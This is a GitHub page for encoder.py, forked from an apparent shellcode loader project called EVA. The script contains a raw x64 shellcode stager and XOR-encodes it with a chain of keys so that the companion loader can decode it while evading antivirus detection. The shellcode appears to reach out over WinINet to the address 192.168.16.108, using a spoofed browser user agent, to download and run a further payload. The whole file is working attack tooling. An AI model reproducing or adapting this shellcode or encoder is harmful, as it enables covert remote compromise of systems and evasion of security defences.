forked from ORCA666/EVA
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathencoder.py
18 lines (12 loc) · 4.06 KB
/
encoder.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/python
#coded by orca666
import sys
# Your shellcode [x64]
raw_data = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x87\x05\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6d\x47\x65\x44\x00\x41\xcb\x72\x2f\x54\xc6\xd7\xcf\x5d\xf9\x71\xe0\x14\x0d\x61\xa5\x9d\x11\xaa\x6c\xc8\x2a\x8e\xdc\xb0\xd5\xa0\x5d\x80\x7d\x5d\x0e\x8b\xed\x70\x88\xb9\xc2\xc8\x6a\x4f\xcb\x5a\xc3\xdb\x84\x6e\xbb\x7c\xaf\x8a\x26\x3c\x21\x1a\x1f\x57\xd8\x9a\x0f\x84\x92\x13\xde\x05\xb8\x02\x84\x88\xe5\xf6\x13\xe7\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x3b\x20\x49\x6e\x66\x6f\x50\x61\x74\x68\x2e\x32\x3b\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x32\x2e\x30\x2e\x35\x30\x37\x32\x37\x29\x0d\x0a\x00\x3e\x08\x05\x5c\x1b\x61\xec\x16\xd4\x08\xee\x07\x14\x1f\xaa\xea\x40\xa9\x6f\x3b\x80\x23\x70\x11\x8d\xeb\x93\x83\x7b\xfa\xa4\x69\x9f\xd6\x33\x00\x19\xa5\x9a\xce\x6e\xb9\x7c\x42\xdc\x9b\xe6\xd5\xdf\xb1\x69\x59\x24\x14\xe7\x8c\xf5\x8d\x84\x82\x4b\xae\x74\xc8\x95\x35\x2b\xc6\x88\xc0\xb9\xbd\x6c\x46\x4c\x20\x36\x0c\xf7\x3f\x18\x63\xe9\x0d\x01\x9f\x7e\x18\x4c\x1c\x47\xca\xe5\x37\xa9\x18\x20\xe8\x01\x4e\xb3\x60\x7c\xb8\xe1\x4a\x16\xed\x98\x08\xec\xac\x78\x11\x0a\x12\x5a\xa7\xf6\x34\x89\x3a\x00\x9f\x45\x92\xcc\x75\x20\x60\xa8\x4a\x32\xb4\x03\x96\xc4\x99\xa5\xc5\xed\x19\xf7\x5d\xbb\xeb\x24\x7a\x04\x3a\x98\x8f\x57\x04\x79\x89\x3a\x64\xf9\xed\x74\xa6\xb2\x33\x40\x5c\x5f\x00\xc9\x77\x4e\xf3\x9e\x14\xb7\x3d\x61\x56\xa0\xcc\x45\x72\x86\x5d\x57\x73\xd8\xa9\xe6\x7c\x99\x88\xdb\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x36\x2e\x31\x30\x38\x00\x19\x69\xa0\x8d"
encoded_shellcode = []
for opcode in raw_data:
# the encryption keys : ^ 0x11) ^ 0x52 ) ^ 0xc7) ^ 0xa3) ^ 0xd8) ^ 0x05) ^ 0x32) ^ 0xf7) ^ 0x7a)
# thus to decode it [if you want to change the key] place the key in reverse order in EVA.cpp
new_opcode = (((((((((ord(opcode) ^ 0x11) ^ 0x52 ) ^ 0xc7) ^ 0xa3) ^ 0xd8) ^ 0x05) ^ 0x32) ^ 0xf7) ^ 0x7a)
encoded_shellcode.append(new_opcode)
print("".join(["\\x{0}".format(hex(abs(i)).replace("0x", "")) for i in encoded_shellcode]))